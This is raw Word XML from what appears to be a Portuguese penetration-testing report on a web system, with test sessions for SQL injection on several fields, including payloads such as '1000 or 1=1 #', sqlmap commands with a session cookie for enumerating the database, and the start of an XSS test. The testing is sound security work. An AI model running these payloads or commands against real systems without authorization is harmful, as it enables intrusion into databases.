    <w:p w:rsidR="00D975CE" w:rsidRPr="00D56FE7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F5169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t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="009F5169" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D975CE" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cadastro” </w:t>
      </w:r>
      <w:r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19</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F5169" w:rsidRPr="00D56FE7" w:rsidRDefault="00B654D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8960" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47876397" wp14:editId="30047BD0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>224790</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="4126865"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapTight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B654D1" w:rsidP="00B654D1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1BC21" wp14:editId="51CB0B17">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>339090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1369060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3914775" cy="142240"/>
                <wp:effectExtent l="0" t="0" r="28575" b="10160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6C42" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:26.7pt;margin-top:-107.8pt;width:308.25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19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Sql Injection </w:t>
      </w:r>
      <w:r w:rsidR="00685A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">no campo cadastro </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>via Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="0048383A" w:rsidP="00B65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7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685A02" w:rsidRPr="00D56FE7" w:rsidRDefault="00685A02" w:rsidP="00B654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Alterar o comando utilizado </w:t>
      </w:r>
      <w:r w:rsidR="009F5169" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>na Sessão de teste 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok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ntar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando: sqlmap -r params -p ok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r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00B654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“ok” é o atributo que sofrerá </w:t>
      </w:r>
      <w:r w:rsidR="009F5169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injeção</w:t>
      </w:r>
      <w:r w:rsidR="009F5169" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL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</w:p>
    <w:p w:rsidR="009F5169" w:rsidRPr="00D56FE7" w:rsidRDefault="009F5169" w:rsidP="009F516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“ok” e não permita que o campo seja injetável à SQL.</w:t>
      </w:r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F5169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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“ok” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 20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9F5169" w:rsidRPr="00D56FE7" w:rsidRDefault="001A1CB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663264" wp14:editId="4EA7FE12">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>234315</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2968625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3914775" cy="142240"/>
                <wp:effectExtent l="0" t="0" r="28575" b="1016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AA46" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:18.45pt;margin-top:233.75pt;width:308.25pt;height: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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002643BE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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FACCA92" wp14:editId="42E40E31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>186690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="4058285"/>
            <wp:effectExtent l="0" t="0" r="0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9F5169" w:rsidP="002643BE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07E46" wp14:editId="7BA90EE1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>234315</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1446530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3609975" cy="1524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5EE7E" id="Retângulo 12" o:spid="_x0000_s1026" style="position:absolute;margin-left:18.45pt;margin-top:-113.9pt;width:284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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 20</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection </w:t>
      </w:r>
      <w:r w:rsidR="00685A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">no parâmetro ok </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>via Sqlmap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73AC1" w:rsidRPr="00D56FE7" w:rsidRDefault="00073AC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185A92" w:rsidP="00073A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3.4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Tela Consulta Servidor - SQL Injection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dia 18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1 hora e 4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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página de Consulta Servidor </w:t>
      </w:r>
      <w:r w:rsidR="00185A92" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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ações não autorizadas no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="0048383A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E14BE4" w:rsidRDefault="00E14B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Verificar se o campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é vulnerável à injeção de código SQL </w:t>
      </w:r>
      <w:r w:rsidR="003F1C5E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizando</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14BE4" w:rsidRDefault="00E14BE4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14BE4" w:rsidRPr="00D56FE7" w:rsidRDefault="00E14BE4" w:rsidP="00E14BE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: 1000’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7FD2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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14BE4" w:rsidRDefault="00E14BE4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14BE4" w:rsidRDefault="00E14BE4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E14B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E14BE4" w:rsidRDefault="00E14B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Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r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r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, a fim de modificar a instruç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ão SQL utilizada pelo sistema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consulta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dos referentes ao siape de usuários cadastrados. Comentários inline</w:t>
      </w:r>
      <w:r w:rsidR="000355DC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, como “–“ e “#”,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ser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tilizados </w:t>
      </w:r>
      <w:r w:rsidR="005269EB" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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s: </w:t>
      </w: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1000 or 1=1 #  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F298F" w:rsidRPr="00D56FE7" w:rsidRDefault="004F298F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1000 or 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F298F" w:rsidRPr="00D56FE7" w:rsidRDefault="004F298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D56FE7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sper</w:t>
      </w:r>
      <w:r w:rsidR="000355DC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-se que o sistema realize o tratamento para impedir que os comentários</w:t>
      </w:r>
      <w:r w:rsidR="000355DC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> inline</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000355DC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>modifiquem a instrução de consulta utilizada pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000355DC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</w:t>
      </w:r>
      <w:r w:rsidR="000355DC" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>licação realizou o tratamento do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ados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrad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B05006" w:rsidRDefault="00B05006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3.5 </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00B05006">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tela Consulta Servidor – Exploração via Sqlmap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nos dias 19, 20 e 22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3 horas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D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="005678E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Utilizar a ferramenta Sqlmap para automatizar o processo de detecção de vulnerabilidades na tela de Consulta Servidor a pa</w:t>
      </w:r>
      <w:r w:rsidR="005678E5" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rtir de injeção de códigos SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05006" w:rsidRDefault="00B05006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D56FE7" w:rsidRDefault="0048383A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B05006" w:rsidRDefault="00B0500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Verificar se a tela Consulta Servidor é vulnerável a injeção de código SQL e</w:t>
      </w:r>
      <w:r w:rsidR="005678E5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caso haja vulnerabilidade</w:t>
      </w:r>
      <w:r w:rsidR="005678E5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conseguir obter o nome do banco de dados utilizado pelo sistema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realizar essa </w:t>
      </w:r>
      <w:r w:rsidR="005678E5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="00BD4B94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foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho HTTP </w:t>
      </w:r>
      <w:r w:rsidR="005678E5" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>da</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> requisição no momento em que a página de Consulta Servidor é acessada.</w:t>
      </w:r>
      <w:r w:rsidR="00986FE1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A figura 21 </w:t>
      </w:r>
      <w:r w:rsidR="00BD4B94" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mostra os dados obtidos através do Burp Suite.</w:t>
      </w:r>
      <w:r w:rsidR="00986FE1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00986FE1" w:rsidRPr="00D56FE7" w:rsidRDefault="00986FE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D56FE7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872158" wp14:editId="30170C0E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56FE7" w:rsidRDefault="00777DDF" w:rsidP="00B05006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1</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00685A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parâmetros</w:t>
      </w:r>
      <w:r w:rsidR="00685A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> da página Consulta Servidor</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtidos através do Burp Suite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: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A5289A" w:rsidRDefault="008C6DC7" w:rsidP="001B2A0B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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./sqlmap.py</w:t>
      </w:r>
      <w:r w:rsidR="001B2A0B" w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-u "http://IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php?pg=servidores"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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00986FE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./sqlmap.py” comando utilizado para executar a aplicação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>“--cookie” especifica um cookie de sessão válido a ser passado para o Sqlmap durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00986FE1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current -db” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.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65D65" w:rsidRPr="00D56FE7" w:rsidRDefault="00D65D6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Default="00D65D6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-se que a tela de Consulta servidor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seja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possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05006" w:rsidRPr="00D56FE7" w:rsidRDefault="00B0500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678E5" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5" w:rsidP="00B05006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417AE8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ão possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00A124E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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A124EE" w:rsidRPr="00D56FE7" w:rsidRDefault="00A124E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Default="0048383A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1B2A0B" w:rsidRPr="00D56FE7" w:rsidRDefault="001B2A0B" w:rsidP="00B05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Repetir a ação da </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidR="00A124EE" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e aumenta</w:t>
      </w:r>
      <w:r w:rsidR="001B2A0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ndo</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o nível de heurística </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5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ntrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A5289A" w:rsidRDefault="008C6DC7" w:rsidP="0001600C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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./sqlmap.py -u "http://IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php?pg=servidores" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="001B2A0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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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./sqlmap.py” comando utilizado para executar a aplicação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cookie” especifica um cookie de sessão válido a ser passado para o SQL MAP durante o ataque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“--current -db” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="0001600C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 “--level 5” comando utilizado para </w:t>
      </w:r>
      <w:r w:rsidR="00A124EE" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>definir</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o nível da heurística utilizada no escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="0001600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6473CA" w:rsidRPr="00D56FE7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-se que a tela Consulta Servidor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lizado pela aplicaçã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EE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Mesmo aumentando o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.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124EE" w:rsidRDefault="00A124EE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5A02" w:rsidRPr="00D56FE7" w:rsidRDefault="00685A02" w:rsidP="00A12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C6DC7" w:rsidRPr="00417AE8" w:rsidRDefault="00417AE8" w:rsidP="00417A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.3 </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00417AE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 4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D56FE7" w:rsidRDefault="00527C9A" w:rsidP="00527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4.3.4.1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Exp</w:t>
      </w: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lorar XSS – Tela Cadastro Lote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7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2 hora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xplorar vulnerabilidade de XSS encon</w:t>
      </w:r>
      <w:r w:rsidR="00527C9A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
